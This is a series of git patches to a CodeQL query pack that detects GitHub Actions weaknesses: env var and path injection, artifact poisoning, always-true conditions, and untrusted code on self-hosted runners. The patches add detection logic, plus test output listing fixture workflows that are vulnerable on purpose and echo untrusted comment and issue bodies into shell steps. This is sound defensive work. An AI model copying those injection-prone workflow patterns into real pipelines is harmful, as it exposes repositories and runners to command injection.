$EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi echo "##[endgroup]" - name: Scan workflows @@ -70,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ env.EXTPACK_PATH }} - EXTPACK_NAME: ${{ env.EXTPACK_NAME }} + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From fbf03fa8e2f7de8eff01d29ef167f7d9f82fcf14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 21:51:27 +0200 Subject: [PATCH 0221/1267] New expression is always true tests --- .../CWE-571/.github/workflows/test.yml | 36 +++++++++++++++---- .../CWE-571/ExpressionIsAlwaysTrue.expected | 4 +++ 2 files changed, 33 insertions(+), 7 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 30c4dcab932..4ed45ff973e 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -1,12 +1,12 @@ -name: Conditionally process PR +name: Event on: - pull_request_target: - types: [opened, synchronize, reopened] + workflow_dispatch: jobs: - process-pr: + if-tests: runs-on: ubuntu-latest + permissions: {} steps: - name: Test 1 if: 1 == 2 @@ -36,10 +36,10 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - github.actor == 'torvalds' || - github.actor == 'dependabot[bot]' + 1 == 2 || + 3 == 4 }} - + - name: Test 8 run: echo "Test 8 should not be printed" if: > @@ -87,3 +87,25 @@ jobs: false || 1 == 2 )}} run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.event_name }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected index a8f068c9cd8..d4c16131cc2 100644 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected @@ -5,3 +5,7 @@ | .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | | .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | | .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | From 0ff967b102d640c77324619f24092c6f61e9ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:07:18 +0200 Subject: [PATCH 0222/1267] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 6a1285de0de..0f7b2ef49ff 100644 --- a/action.yml +++ b/action.yml @@ -27,7 +27,7 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" From 39308fd89f2ca63366f2ad1e3a9e23d7130f15c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:09:03 +0200 Subject: [PATCH 0223/1267] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 0f7b2ef49ff..35c423e103d 100644 --- a/action.yml +++ b/action.yml @@ -45,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 27d0a3406dd9fad12f1b2bcdea8634465d7bcac4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 26 Apr 2024 16:17:29 +0200 Subject: [PATCH 0224/1267] Improve Env path/var injection queries --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/ast/internal/Ast.qll | 19 +- .../actions/controlflow/internal/Cfg.qll | 8 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +- .../dataflow/internal/DataFlowPrivate.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 7 +- .../security/EnvPathInjectionQuery.qll | 58 +- .../actions/security/EnvVarInjectionQuery.qll | 56 +- ql/lib/qlpack.yml | 2 +- .../CodeExecutionOnSelfHostedRunner.ql | 47 ++ ql/src/qlpack.yml | 2 +- ql/test/library-tests/test.actual | 598 ++++++++++++++++++ .../.github/workflows/sonar-source.yml | 75 --- .../CWE-077/.github/workflows/test1.yml | 20 +- .../CWE-077/.github/workflows/test2.yml | 34 +- .../CWE-077/.github/workflows/test3.yml | 47 +- .../CWE-077/.github/workflows/test4.yml | 29 +- .../CWE-077/.github/workflows/test5.yml | 36 ++ .../CWE-077/EnvPathInjection.expected | 20 +- .../Security/CWE-077/EnvVarInjection.expected | 39 +- .../PrivilegedEnvPathInjection.expected | 26 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 + .../PrivilegedEnvVarInjection.expected | 53 +- .../Security/CWE-094/CodeInjection.expected | 6 +- .../CWE-094/PrivilegedCodeInjection.expected | 6 +- .../CWE-200/.github/workflows/test1.yml | 46 +- .../CWE-200/SecretExfiltration.expected | 20 +- .../CWE-284/.github/workflows/test1.yml | 28 + .../CWE-284/.github/workflows/test2.yml | 26 + .../CodeExecutionOnSelfHostedRunner.expected | 4 + .../CodeExecutionOnSelfHostedRunner.qlref | 2 + .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 78 +-- 33 files changed, 1063 insertions(+), 422 deletions(-) create mode 100644 ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql create mode 100644 ql/test/library-tests/test.actual delete mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7c4bf9aa8af..8e36aef408e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -298,6 +298,8 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } + + string getARunsOnLabel() { result = super.getARunsOnLabel() } } class LocalJob extends Job instanceof LocalJobImpl { @@ -352,6 +354,8 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } class Run extends Step instanceof RunImpl { string getScript() { result = super.getScript() } + ScalarValue getScriptScalar() { result = super.getScriptScalar() } + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7cc70c86d20..0c53dae6371 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -579,10 +579,12 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; + YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and + runson = n.lookup("runs-on").(YamlMappingLikeNode) } override string toString() { result = "Job: " + jobId } @@ -660,6 +662,19 @@ class JobImpl extends AstNodeImpl, TJobNode { // The enclosing workflow is privileged this.getEnclosingWorkflow().isPrivileged() } + + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(string lbl, YamlNode r | + ( + r = runson.getNode(lbl) and + not lbl = ["group", "labels"] + or + r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + ) and + result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ) + } } class LocalJobImpl extends JobImpl { @@ -865,6 +880,8 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue() } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } override string toString() { diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index f3785eada37..0db8d63e6f3 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -260,7 +260,11 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and + ( + child = super.getInScopeEnvVarExpr(_) or + child = super.getAnScriptExpr() or + child = super.getScriptScalar() + ) and l = child.getLocation() | child @@ -291,3 +295,5 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } + +predicate test(ScalarValueLeaf f) { any() } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4e049615045..b24f9484a80 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -33,9 +33,13 @@ class AdditionalTaintStep extends Unit { predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and - succ.asExpr() = run + ( + Utils::writeToGitHubEnv(run, _, value) or + Utils::writeToGitHubOutput(run, _, value) or + Utils::writeToGitHubPath(run, value) + ) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + succ.asExpr() = run.getScriptScalar() ) } @@ -85,12 +89,9 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - ( - Utils::writeToGitHubOutput(run, key, value) or - Utils::writeToGitHubEnv(run, key, value) - ) and + Utils::writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } @@ -99,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and Utils::writeToGitHubEnv(run, key, value) and @@ -110,12 +111,16 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ +predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Run run | + pred.asExpr() = download and + succ.asExpr() = run.getScriptScalar() and + download.getAFollowingStep() = run + ) +} + class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - exists(UntrustedArtifactDownloadStep download, Run run | - node1.asExpr() = download and - node2.asExpr() = run and - download.getAFollowingStep() = run - ) + artifactDownloadToUseStep(node1, node2) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3cbb940131c..f63af3c10be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -61,7 +61,8 @@ class DataFlowExpr extends Cfg::Node { this.getAstNode() instanceof Uses or this.getAstNode() instanceof Run or this.getAstNode() instanceof Outputs or - this.getAstNode() instanceof Input + this.getAstNode() instanceof Input or + this.getAstNode() instanceof ScalarValue } } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 95dc22a40de..8b7eb51276d 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -299,7 +299,12 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { } class ArtifactPoisoningSink extends DataFlow::Node { - ArtifactPoisoningSink() { this.asExpr() instanceof PoisonableStep } + ArtifactPoisoningSink() { + exists(PoisonableStep step | + step.(Run).getScriptScalar() = this.asExpr() or + step.(UsesStep) = this.asExpr() + ) + } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a5cf2d600f0..25de24032ba 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -5,23 +5,18 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envPathInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string value | - Utils::writeToGitHubPath(run, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvPathInjectionSink extends DataFlow::Node { } -predicate envPathInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) +class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { + EnvPathInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } /** @@ -32,26 +27,23 @@ predicate envPathInjectionFromFileSink(DataFlow::Node sink) { * run: | * echo "$BODY" >> $GITHUB_PATH */ -predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varname, string value | - sink.asExpr().getInScopeEnvVarExpr(varname) = expr and - run = sink.asExpr() and - Utils::writeToGitHubPath(run, value) and - ( - value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] - or - value.matches("$(echo %") and value.indexOf(varname) > 0 +class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { + EnvPathInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string value | + this.asExpr().getInScopeEnvVarExpr(varname) = expr and + run.getScriptScalar() = this.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) ) - ) + } } -private class EnvPathInjectionSink extends DataFlow::Node { - EnvPathInjectionSink() { - envPathInjectionFromExprSink(this) or - envPathInjectionFromFileSink(this) or - envPathInjectionFromEnvSink(this) or - externallyDefinedSink(this, "envpath-injection") - } +class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { + EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0ae333a56f5..cdcc1dbdf81 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -5,33 +5,43 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envVarInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string key, string value | - Utils::writeToGitHubEnv(run, key, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvVarInjectionSink extends DataFlow::Node { } -predicate envVarInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) -} - -private class EnvVarInjectionSink extends DataFlow::Node { - EnvVarInjectionSink() { - envVarInjectionFromExprSink(this) or - envVarInjectionFromFileSink(this) or - externallyDefinedSink(this, "envvar-injection") +// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { +// exists(Expression expr, Run run, string varName, string key, string value | +// expr = run.getInScopeEnvVarExpr(varName) and +// Utils::writeToGitHubEnv(run, key, value) and +// expr = sink.asExpr() and +// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") +// ) +// } +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string key, string value | + expr = run.getInScopeEnvVarExpr(varname) and + Utils::writeToGitHubEnv(run, key, value) and + run.getScriptScalar() = this.asExpr() and + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + ) } } +class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { + EnvVarInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } +} + +class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { + EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } +} + /** * A taint-tracking configuration for unsafe user input * that is used to construct and evaluate an environment variable. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f6efd7fa0f1..1710768761f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.17 +version: 0.0.18 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql new file mode 100644 index 00000000000..c7bdfbbc323 --- /dev/null +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -0,0 +1,47 @@ +/** + * @name Pull Request code execution on self-hosted runner + * @description Running untrusted code on a public repository's self-hosted runner can lead to the compromise of the runner machine + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/pr-on-self-hosted-runner + * @tags actions + * security + * external/cwe/cwe-284 + */ + +import actions +import codeql.actions.dataflow.ExternalFlow + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getEnclosingWorkflow().getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + not label + .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.matches("self-hosted:true") + ) +} + +from Job job +where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) +select job, "Job runs on self-hosted runner" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9e8fdef850a..24f07dafe89 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.17 +version: 0.0.18 groups: - actions - queries diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual new file mode 100644 index 00000000000..ee68d409634 --- /dev/null +++ b/ql/test/library-tests/test.actual @@ -0,0 +1,598 @@ +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | 